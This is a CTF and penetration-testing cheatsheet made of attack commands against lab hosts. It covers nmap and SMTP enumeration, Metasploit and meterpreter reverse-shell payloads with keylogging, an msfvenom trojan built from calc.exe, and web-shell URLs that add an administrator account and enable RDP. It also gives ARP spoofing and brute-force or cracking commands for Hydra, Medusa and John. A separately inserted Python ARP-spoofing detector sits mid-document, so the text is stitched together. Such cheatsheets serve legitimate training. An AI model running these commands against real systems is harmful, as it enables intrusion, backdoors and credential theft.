ASR CTF Cheatsheet PDF
Enumeration - smtp-user-enum
Vulnerability Scan
Nessus
NIKTO - web scanning
ZAP Proxy
Exploits
Metasploit
Meterpreter
Add Trojan
Microsoft Commands
Upload file to Microsoft Windows
Using SMB share
Using meterpreter
Web Vulnerabilities
SQL Injection
Add script through SQL Injection
Network Attacks
ARP spoofing
MitM
HTTPS method 1 - DNS spoofing
HTTPS method 2 - SSL Stripping
Password Attack
Medusa (remote)
John the Ripper
Complex passwords generator
Unshadowing (local)
Crack LM/NTLM hashes (local)
Crack LM
Crack NTLM
Hydra (remote)
Online rainbowtables
NMAP
ARP based
nmap -sn
ICMP based
nmap -sn
UDP Ping
nmap -PU
Others
https://nmap.org/book/man-host-discovery.html
NMAP Port Scanning
ACK Scan
nmap -sA
UDP Scan
if ICMP Host Unreachable reply - port closed
else not sure! (no reply is ambiguous)
nmap -sU
Others
https://nmap.org/book/man-port-scanning-techniques.html
NMAP options
Specify target
192.168.1-254.1-254
IP/16
nmap -iL iplist.txt
Specify ports
-p21,22
-p1-65535
Output redirection
nmap -oN output.txt 192.168.1.1
Scanning speed
-T<0-5> (default is 3)
No DNS resolution
-n
OS detection
-O
Scripts
ls /usr/share/nmap/scripts
nmap --script <script>
nmap --script discovery <IP>
nmap --script http* <IP>
Enumeration - smtp-user-enum
https://github.com/pentestmonkey/smtp-user-enum/blob/master/smtp-user-enum-user-docs.pdf
smtp-user-enum -M [method: VRFY, EXPN, RCPT TO] -U [UserList] -t [target]
Vulnerability Scan
Nessus
Download: http://www.tenable.com/products/nessus/select-your-operating-system#tos
Verify: netstat -tlnp | grep 8834
service nessusd restart
To disable categories: in the Policy, Plugins tab, disable Brute Force and Denial of Service
Exploits
Metasploit
msfconsole
> search <vulnerability code> ex: ms08-067
> use <path returned by search>
> info --------------> show module details and what is already configured, ex: RHOST
> show options
> show payloads -----> list of payloads compatible with this exploit
> set RHOST <IP target>
> set LHOST <local IP>
> set PAYLOAD <chosen payload> ex: windows/shell/reverse_tcp
> exploit
Meterpreter
> set PAYLOAD <meterpreter payload> ex: windows/meterpreter/reverse_tcp
> exploit
> download C:\\WINDOWS\\system32\\calc.exe /root/
> keyscan start
> keyscan dump
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
Add Trojan
ex:
msfvenom -p windows/shell/reverse_tcp LHOST=172.16.150.129 -a x86 --platform Windows \
  -e x86/shikata_ga_nai -i 3 -x /root/calc.exe -o calc_backdoor.exe
Using meterpreter
meterpreter> upload calc_backdoor.exe C://WINDOWS//system32
Web Vulnerabilities
SQL Injection
Discover the vulnerabilities with ZapProxy
http://pentestmonkey.net/category/cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://www.101hacker.com/2010/12/sql-injection-tutorial.html
http://172.16.150.130/c.php?cmd=hostname
http://172.16.150.130/c.php?cmd=net user <user> <password> /add
http://172.16.150.130/c.php?cmd=net localgroup Administrators <user> /add ---> add the user to the Administrators group
http://172.16.150.130/c.php?cmd=reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Network Attacks
ARP spoofing
MitM
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2 ← -t <target IP> <gateway IP>
--close---
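A defender-side check for the symptom the arpspoof command above leaves in a victim's ARP cache, added here as an example (not part of the original cheatsheet): it parses /proc/net/arp style output and flags one MAC answering for two IPs, or a gateway whose MAC no longer matches a recorded baseline. The addresses, MACs and baseline are constructed.

```python
"""Detect ARP-cache anomalies typical of ARP spoofing (added example)."""


def _arp_table(rows):
    """Build constructed /proc/net/arp text from (ip, mac, flags) rows."""
    header = "IP address       HW type     Flags       HW address            Mask     Device"
    lines = [header]
    for ip, mac, flags in rows:
        lines.append(f"{ip:<16} 0x1         {flags:<11} {mac:<21} *        eth0")
    return "\n".join(lines) + "\n"


# Constructed healthy cache: gateway .2, attacker host .129, victim-side peer .130,
# plus an incomplete (flags 0x0) entry that a parser must ignore.
CLEAN_ARP_TABLE = _arp_table([
    ("172.16.150.2", "00:50:56:e1:aa:01", "0x2"),
    ("172.16.150.129", "00:0c:29:4b:12:34", "0x2"),
    ("172.16.150.130", "00:0c:29:77:55:66", "0x2"),
    ("172.16.150.200", "00:00:00:00:00:00", "0x0"),
])

# Constructed spoofed cache: the gateway IP now carries .129's MAC.
SPOOFED_ARP_TABLE = _arp_table([
    ("172.16.150.2", "00:0c:29:4b:12:34", "0x2"),
    ("172.16.150.129", "00:0c:29:4b:12:34", "0x2"),
    ("172.16.150.130", "00:0c:29:77:55:66", "0x2"),
])

# Assumed baseline recorded on a known-good day: gateway IP -> real gateway MAC.
BASELINE = {"172.16.150.2": "00:50:56:e1:aa:01"}


def parse_arp_table(text):
    """Return {ip: mac} for complete entries; skip header and flags 0x0 rows."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4 or fields[2] == "0x0":
            continue
        entries[fields[0]] = fields[3].lower()
    return entries


def find_arp_anomalies(text, baseline):
    """Return (kind, subject, mac) findings; an empty list means no anomaly."""
    entries = parse_arp_table(text)
    findings = []
    by_mac = {}
    for ip, mac in entries.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():          # one MAC claiming several IPs
        if len(ips) > 1:
            findings.append(("duplicate_mac", ", ".join(sorted(ips)), mac))
    for ip, good_mac in baseline.items():    # baseline host whose MAC changed
        seen = entries.get(ip)
        if seen is not None and seen != good_mac.lower():
            findings.append(("gateway_mac_changed", ip, seen))
    return findings
```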
Password Attack
https://github.com/danielmiessler/SecLists/tree/master/Passwords
https://github.com/danielmiessler/SecLists/blob/master/Passwords/500-worst-passwords.txt
Medusa (remote)
medusa -h 172.16.150.132 -u dexter -P 500-worst-passwords.txt -M ssh
http://foofus.net/goons/jmk/medusa/medusa.html
Unshadowing (local)
unshadow passwd shadow > unshadow.txt
john unshadow.txt
Crack LM
john --format=LM windump.txt
john --show windump.txt
Crack NTLM
john --show windump.txt | cut -d: -f2 > pwd_LM.txt
john --wordlist=pwd_LM.txt --rules=NT --format=NT hashes.txt
john --show --rules=NT --format=NT windump.txt
Hydra (remote)
hydra -l dexter -P newdictionary.txt ssh://172.16.150.132
Online rainbow tables
http://rainbowtables.it64.com/
https://crackstation.net/
https://www.objectif-securite.ch/en/ophcrack.php